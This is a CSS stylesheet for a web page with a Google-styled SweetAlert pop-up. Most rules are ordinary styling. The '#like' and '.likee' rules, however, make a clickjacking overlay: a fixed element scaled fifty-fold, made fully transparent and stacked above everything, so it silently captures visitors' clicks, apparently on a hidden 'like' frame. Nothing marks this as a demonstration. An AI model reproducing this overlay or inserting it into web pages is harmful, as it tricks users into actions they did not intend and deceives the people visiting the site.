
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');

body {
    font-family: 'Roboto', sans-serif;
}

iframe {
    border: 0;
    outline: 0;
}

#like {
    position: fixed;
    -moz-transform: scale(50.0);
    -webkit-transform: scale(50.0);
    -ms-transform: scale(50.0);
    opacity: .0;
    top: 385px;
    left: 700px;
}

.sweet-overlay {
    background-color: rgba(255, 255, 255, 0.2) !important;
    backdrop-filter: blur(5px);
    -webkit-backdrop-filter: blur(5px);
}

.sweet-alert {
    background-color: #ffffff;
    border-radius: 12px;
    box-shadow: 0 10px 20px rgba(0,0,0,0.19), 0 6px 6px rgba(0,0,0,0.23);
    font-family: 'Roboto', sans-serif;
    padding: 25px;
}

.sweet-alert h2 {
    color: #202124;
    font-size: 26px;
    font-weight: 700;
}

.sweet-alert p {
    color: #5f6368;
    font-size: 18px;
}

.sweet-alert button {
    background-color: #1a73e8 !important;
    color: #ffffff !important;
    border: none !important;
    box-shadow: 0 2px 4px rgba(0,0,0,0.2);
    font-weight: 700 !important;
    text-transform: uppercase;
    border-radius: 8px !important;
    padding: 14px 28px !important;
    font-size: 16px !important;
    transition: all 0.2s ease-in-out;
}

.sweet-alert button:hover {
    box-shadow: 0 6px 12px rgba(0,0,0,0.2);
    transform: translateY(-2px);
}

.likee {
    position: fixed;
    -moz-transform: scale(50.0);
    -webkit-transform: scale(50.0);
    -ms-transform: scale(50.0);
    opacity: .0;
    top: 385px;
    left: 700px;
    z-index: 9999999;
    height: 1000px;
    width: 1000px;
}